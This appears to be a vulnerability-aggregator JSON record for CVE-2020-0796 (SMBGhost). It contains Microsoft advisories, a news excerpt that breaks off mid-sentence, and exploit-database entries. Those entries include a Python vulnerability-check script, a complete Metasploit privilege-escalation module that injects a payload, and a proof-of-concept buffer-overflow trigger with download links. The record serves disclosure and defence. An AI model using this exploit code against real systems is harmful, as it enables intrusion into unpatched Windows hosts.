"CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2022-10-27T00:23:14", "description": "**Important** March 12, 2020 - Microsoft has released CVE-2020-0796 | Windows SMBv3 Client/Server Remote Code Execution Vulnerability to address this vulnerability. For more information about this issue, including download links for an available security update, please review [CVE-2020-0796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>).\n\nMicrosoft is aware of a remote code execution vulnerability in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target SMB Server or SMB Client.\n\nTo exploit the vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 Server. To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.\n\nWe will update this advisory when updates are available. If you wish to be notified when this advisory is updated, we recommend that you register for the security notifications mailer to be alerted of content changes to this advisory. See [Microsoft Technical Security Notifications](<https://www.microsoft.com/en-us/msrc/technical-security-notifications?rtc=1>).\n\nPublicly Disclosed | Exploited \n---|--- \nNo | No\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-10T07:00:00", "type": "mscve", "title": "Microsoft Guidance for Disabling SMBv3 Compression", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T07:00:00", "id": "MS:ADV200005", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/ADV200005", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-26T18:28:11", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server or client.\n\nTo exploit the vulnerability against a server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 server. To exploit the vulnerability against a client, an unauthenticated attacker would need to configure a malicious SMBv3 server and convince a user to connect to it.\n\nThe security update addresses the vulnerability by correcting how the SMBv3 protocol handles these specially crafted requests.\n", "edition": 1, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-12T07:00:00", "type": "mscve", "title": "Windows SMBv3 Client/Server Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-13T07:00:00", "id": "MS:CVE-2020-0796", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0796", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-03-19T23:37:23", "description": "", "cvss3": {}, "published": "2020-03-15T00:00:00", "type": "packetstorm", "title": "Microsoft Windows SMB 3.1.1 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-15T00:00:00", "id": "PACKETSTORM:156732", "href": "https://packetstormsecurity.com/files/156732/Microsoft-Windows-SMB-3.1.1-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Windows SMBv3 Client/Server Remote Code Execution \nVulnerability - remote \n# Author: nu11secur1ty \n# Date: 2020-03-14 \n# Vendor: https://smb.wsu.edu/ \n# Link: \nhttps://github.com/nu11secur1ty/Windows10Exploits/tree/master/Undefined/CVE-2020-0796 \n# CVE: CVE-2020-0796 \n \n \n \n[+] Credits: Ventsislav Varbanovski (@ nu11secur1ty) \n[+] Website: https://www.nu11secur1ty.com/ \n[+] Source: readme from GitHUB \n[+] twitter.com/nu11secur1ty \n \n \n[Exploit Program Code] \n-------------------------------------- \nimport socket \nimport struct \nimport sys \n \nsmbsuckmickey_mouse = \nb'\\x00\\x00\\x00\\xc0\\xfeSMB@\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00$\\x00\\x08\\x00\\x01\\x00\\x00\\x00\\x7f\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00x\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\x02\\x02\\x10\\x02\"\\x02$\\x02\\x00\\x03\\x02\\x03\\x10\\x03\\x11\\x03\\x00\\x00\\x00\\x00\\x01\\x00&\\x00\\x00\\x00\\x00\\x00\\x01\\x00 \n\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\n\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00' \nsock = socket.socket(socket.AF_INET) \nsock.settimeout(3) \nsock.connect(( sys.argv[1], 445 )) \nsock.send(smbsuckmickey_mouse) \n \nnb, = struct.unpack(\">I\", sock.recv(4)) \nres = sock.recv(nb) \n \nif not res[68:70] == b\"\\x11\\x03\": \nexit(\"Not vulnerable.\") \nif not res[70:72] == b\"\\x02\\x00\": \nexit(\"Not vulnerable.\") \n \nexit(\"Vulnerable.\") \n \n-------------------------------------- \n \n#!/usr/bin/bash \nif [ $# -eq 0 ] \nthen \necho $'Usage:\\n\\vulnsmb.sh TARGET_IP_or_CIDR' \nexit 1 \nfi \necho \"Checking if there's SMB v3.11 in\" $1 \"...\" \nnmap -p445 --script smb-protocols -Pn -n $1 | grep -P \n'\\d+\\.\\d+\\.\\d+\\.\\d+|^\\|.\\s+3.11' | tr '\\n' ' ' | replace 'Nmap scan report \nfor' '@' | tr \"@\" \"\\n\" | grep 3.11 | tr '|' ' ' | tr '_' ' ' | grep -oP \n'\\d+\\.\\d+\\.\\d+\\.\\d+' \nif [[ $? != 0 ]]; then \necho \"There's no SMB v3.11\" \nfi \n \n------------------------------------- \n \n[Vendor] \nMicrosoft \n \n \n[Product] \nhttps://smb.wsu.edu/ \n \n \n[Vulnerability Type] \nRemote + Layer 2 \n \n \n \n[Security Issue] \nThe security update addresses the vulnerability by correcting how the SMBv3 \nprotocol handles these specially crafted requests. \n \n \n[References] \nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0796 \nA remote code execution vulnerability exists in the way that the Microsoft \nServer Message Block 3.1.1 (SMBv3) protocol handles certain requests. \nAn attacker who successfully exploited the vulnerability could gain the \nability to execute code on the target server or client. \nTo exploit the vulnerability against a server, an unauthenticated attacker \ncould send a specially crafted packet to a targeted SMBv3 server. \nTo exploit the vulnerability against a client, an unauthenticated attacker \nwould need to configure a malicious SMBv3 server and convince a user to \nconnect to it. \nThe security update addresses the vulnerability by correcting how the SMBv3 \nprotocol handles these specially crafted requests. \n \n[Network Access] \nRemote + Layer 2 \n \n \n[Disclosure Timeline] \nPublished: 03/12/2020 \n \n \n[+] Disclaimer \nThe entry creation date may reflect when the CVE ID was allocated or \nreserved, \nand does not necessarily indicate when this vulnerability was discovered, \nshared \nwith the affected vendor, publicly disclosed, or updated in CVE. \n \n-- \n \nhiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= \nnu11secur1ty <http://nu11secur1ty.blogspot.com/> \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156732/mswinsmb3-exec.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-08T09:59:30", "description": "", "cvss3": {}, "published": "2020-04-06T00:00:00", "type": "packetstorm", "title": "SMBv3 Compression Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-04-06T00:00:00", "id": "PACKETSTORM:157110", "href": "https://packetstormsecurity.com/files/157110/SMBv3-Compression-Buffer-Overflow.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = GoodRanking \n \ninclude Msf::Post::File \ninclude Msf::Post::Windows::Priv \ninclude Msf::Post::Windows::Process \ninclude Msf::Post::Windows::ReflectiveDLLInjection \ninclude Msf::Exploit::Remote::AutoCheck \n \ndef initialize(info={}) \nsuper(update_info(info, { \n'Name' => 'SMBv3 Compression Buffer Overflow', \n'Description' => %q{ \nA vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to \nexecute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself \nbefore injecting a payload into winlogon.exe. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Daniel Garc\u00eda Guti\u00e9rrez', # original LPE exploit \n'Manuel Blanco Paraj\u00f3n', # original LPE exploit \n'Spencer McIntyre' # metasploit module \n], \n'Arch' => [ ARCH_X86, ARCH_X64 ], \n'Platform' => 'win', \n'SessionTypes' => [ 'meterpreter' ], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n}, \n'Targets' => \n[ \n#[ 'Windows 10 x86', { 'Arch' => ARCH_X86 } ], \n[ 'Windows 10 v1903-1909 x64', { 'Arch' => ARCH_X64 } ] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'References' => \n[ \n[ 'CVE', '2020-0796' ], \n[ 'URL', 'https://github.com/danigargu/CVE-2020-0796' ], \n[ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005' ] \n], \n'DisclosureDate' => '2020-03-13', \n'DefaultTarget' => 0, \n'AKA' => [ 'SMBGhost', 'CoronaBlue' ], \n'Notes' => \n{ \n'Stability' => [ CRASH_OS_RESTARTS, ], \n'Reliability' => [ REPEATABLE_SESSION, ], \n}, \n})) \nend \n \ndef check \nsysinfo_value = sysinfo[\"OS\"] \n \nif sysinfo_value !~ /windows/i \n# Non-Windows systems are definitely not affected. \nreturn Exploit::CheckCode::Safe \nend \n \nbuild_num = sysinfo_value.match(/\\w+\\d+\\w+(\\d+)/)[0].to_i \nvprint_status(\"Windows Build Number = #{build_num}\") \n# see https://docs.microsoft.com/en-us/windows/release-information/ \nunless sysinfo_value =~ /10/ && (build_num >= 18362 && build_num <= 18363) \nprint_error('The exploit only supports Windows 10 versions 1903 - 1909') \nreturn CheckCode::Safe \nend \n \ndisable_compression = registry_getvaldata(\"HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\LanmanServer\\\\Parameters\",\"DisableCompression\") \nif !disable_compression.nil? && disable_compression != 0 \nprint_error('The exploit requires compression to be enabled') \nreturn CheckCode::Safe \nend \n \nCheckCode::Appears \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \n \nif sysinfo[\"Architecture\"] =~ /wow64/i \nfail_with(Failure::NoTarget, 'Running against WOW64 is not supported') \nelsif sysinfo[\"Architecture\"] == ARCH_X64 && target.arch.first == ARCH_X86 \nfail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') \nelsif sysinfo[\"Architecture\"] == ARCH_X86 && target.arch.first == ARCH_X64 \nfail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') \nend \n \nprint_status('Launching notepad to host the exploit...') \nnotepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true}) \nbegin \nprocess = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) \nprint_good(\"Process #{process.pid} launched.\") \nrescue Rex::Post::Meterpreter::RequestError \n# Reader Sandbox won't allow to create a new process: \n# stdapi_sys_process_execute: Operation failed: Access is denied. \nprint_error('Operation failed. Trying to elevate the current process...') \nprocess = client.sys.process.open \nend \n \nprint_status(\"Reflectively injecting the exploit DLL into #{process.pid}...\") \nlibrary_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0796', 'CVE-2020-0796.x64.dll') \nlibrary_path = ::File.expand_path(library_path) \n \nprint_status(\"Injecting exploit into #{process.pid}...\") \nexploit_mem, offset = inject_dll_into_process(process, library_path) \n \nprint_status(\"Exploit injected. Injecting payload into #{process.pid}...\") \nencoded_payload = payload.encoded \npayload_mem = inject_into_process(process, [encoded_payload.length].pack('I<') + encoded_payload) \n \n# invoke the exploit, passing in the address of the payload that \n# we want invoked on successful exploitation. \nprint_status('Payload injected. Executing exploit...') \nprocess.thread.create(exploit_mem + offset, payload_mem) \n \nprint_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.') \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/157110/cve_2020_0796_smbghost.rb.txt", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T20:40:20", "description": "\nMicrosoft Windows 10 (19031909) - SMBGhost SMB3.1.1 SMB2_COMPRESSION_CAPABILITIES Buffer Overflow (PoC)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-14T00:00:00", "title": "Microsoft Windows 10 (19031909) - SMBGhost SMB3.1.1 SMB2_COMPRESSION_CAPABILITIES Buffer Overflow (PoC)", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-14T00:00:00", "id": "EXPLOITPACK:CFD5A967D4C18FB68D3D775FE9AAAA38", "href": "", "sourceData": "# CVE-2020-0796 PoC aka CoronaBlue aka SMBGhost\n\nDownload ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48216.zip\n\n## Usage\n\n`./CVE-2020-0796.py servername`\n\nThis script connects to the target host, and compresses the authentication request with a bad offset field set in the transformation header, causing the decompressor to buffer overflow and crash the target.\n\nThis contains a modification of the excellent [smbprotocol](https://github.com/jborean93/smbprotocol) with added support for SMB 3.1.1 compression/decompression (only LZNT1). Most of the additions are in `smbprotocol/connection.py`. A version of [lznt1](https://github.com/you0708/lznt1) is included, modified to support Python 3.\n\nThe compression transform header is in the `SMB2CompressionTransformHeader` class there. The function `_compress` is called to compress tree requests. This is where the offset field is set all high to trigger the crash.\n\n```python\n def _compress(self, b_data, session):\n header = SMB2CompressionTransformHeader()\n header['original_size'] = len(b_data)\n header['offset'] = 4294967295\n header['data'] = smbprotocol.lznt1.compress(b_data)\n```\n\n## About\n\nCVE-2020-0796 is a bug in Windows 10 1903/1909's new SMB3 compression capability. SMB protocol version 3.1.1 introduces the ability for a client or server to advertise compression cabilities, and to selectively compress SMB3 messages as beneficial. To accomplish this, when negotiating an SMB session, the client and server must both include a `SMB2_COMPRESSION_CAPABILITIES` as documented in [MS-SMB2 2.2.3.1.3](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/78e0c942-ab41-472b-b117-4a95ebe88271).\n\nOnce a session is negotiated with this capability, either the client or the server can selectively compress certain SMB messages. To do so, the entire SMB packet is compressed, and a transformed header is prepended, as documented in [MS-SMB2 2.2.42](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/1d435f21-9a21-4f4c-828e-624a176cf2a0). This header is a small (16 bytes) structure with a magic value, the uncompressed data size, the compression algorithm used, and an offset value.\n\nCVE-2020-0796 is caused by a lack of bounds checking in that offset size, which is directly passed to several subroutines. Passing a large value in will cause a buffer overflow, and crash the kernel. With further work, this could be developed into a RCE exploit.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-04-01T20:40:20", "description": "\nMicrosoft Windows 10 (19031909) - SMBGhost SMB3.1.1 SMB2_COMPRESSION_CAPABILITIES Local Privilege Escalation", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-30T00:00:00", "title": "Microsoft Windows 10 (19031909) - SMBGhost SMB3.1.1 SMB2_COMPRESSION_CAPABILITIES Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-30T00:00:00", "id": "EXPLOITPACK:162FCF5EA0445C77E29A0F6775C5E7F6", "href": "", "sourceData": "# CVE-2020-0796\n\nWindows SMBv3 LPE Exploit\n\n![exploit](https://user-images.githubusercontent.com/1675387/77913732-110d4f80-7295-11ea-9af6-f17201c66673.gif)\n\n## Authors\n\n * Daniel Garc\u00eda Guti\u00e9rrez ([@danigargu](https://twitter.com/danigargu))\n * Manuel Blanco Paraj\u00f3n ([@dialluvioso_](https://twitter.com/dialluvioso_))\n\n## References\n\n* https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796\n* https://www.synacktiv.com/posts/exploit/im-smbghost-daba-dee-daba-da.html\n* https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server.html#.Xndfn0lv150.twitter\n* https://www.mcafee.com/blogs/other-blogs/mcafee-labs/smbghost-analysis-of-cve-2020-0796/\n* http://blogs.360.cn/post/CVE-2020-0796.html\n* https://blog.zecops.com/vulnerabilities/vulnerability-reproduction-cve-2020-0796-poc/\n\n\nDownload ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48267.zip", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "canvas": [{"lastseen": "2021-07-28T14:33:16", "description": "**Name**| SMBGHOST \n---|--- \n**CVE**| CVE-2020-0796-1 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| SMBGHOST \n**Notes**| CVE Name: CVE-2020-0796 \nVENDOR: Microsoft \nNOTES: some notes here \n \nVersionsAffected: VERSIONS \nRepeatability: None \nReferences: https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0796 \nDate public: 4/13/2020 \nCVSS: 10.0 \n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-12T16:15:00", "title": "Immunity Canvas: SMBGHOST", "type": "canvas", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T16:15:00", "id": "SMBGHOST", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/SMBGHOST", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:14", "description": "**Name**| smbghost_lpe \n---|--- \n**CVE**| CVE-2020-0796 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| smbghost_lpe \n**Notes**| CVE Name: CVE-2020-0796 \nNotes: Tested: - Windows 10 1903 x64 - Windows 10 1909 x64 \nVENDOR: Microsoft \nCVE Url: https://nvd.nist.gov/vuln/detail/CVE-2020-0796 \nCVSS: 10.0 \n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-03-12T16:15:00", "title": "Immunity Canvas: SMBGHOST_LPE", "type": "canvas", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T16:15:00", "id": "SMBGHOST_LPE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/smbghost_lpe", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:38:33", "description": "[![windows patch update for smb vulnerability](https://thehackernews.com/images/-5ab1xlAFvIs/XmprBKhq5MI/AAAAAAAA2hk/2zyiQtK0qLk65nIPuJSj39T5x7IgNWU8QCLcBGAsYHQ/s728-e100/windows-update-smb-flaw.jpg)](<https://thehackernews.com/images/-5ab1xlAFvIs/XmprBKhq5MI/AAAAAAAA2hk/2zyiQtK0qLk65nIPuJSj39T5x7IgNWU8QCLcBGAsYHQ/s728-e100/windows-update-smb-flaw.jpg>)\n\nMicrosoft today finally released an emergency software update to patch the recently disclosed very dangerous [vulnerability in SMBv3 protocol](<https://thehackernews.com/2020/03/smbv3-wormable-vulnerability.html>) that could let attackers launch **wormable malware**, which can propagate itself from one vulnerable computer to another automatically. \n \nThe vulnerability, tracked as **CVE-2020-0796**, in question is a remote code execution flaw that impacts Windows 10 version 1903 and 1909, and Windows Server version 1903 and 1909. \n \nServer Message Block (SMB), which runs over TCP port 445, is a network protocol that has been designed to enable file sharing, network browsing, printing services, and interprocess communication over a network. \n \nThe latest vulnerability, for which a patch update ([KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>)) is now available on the Microsoft website, exists in the way SMBv3 protocol handles requests with 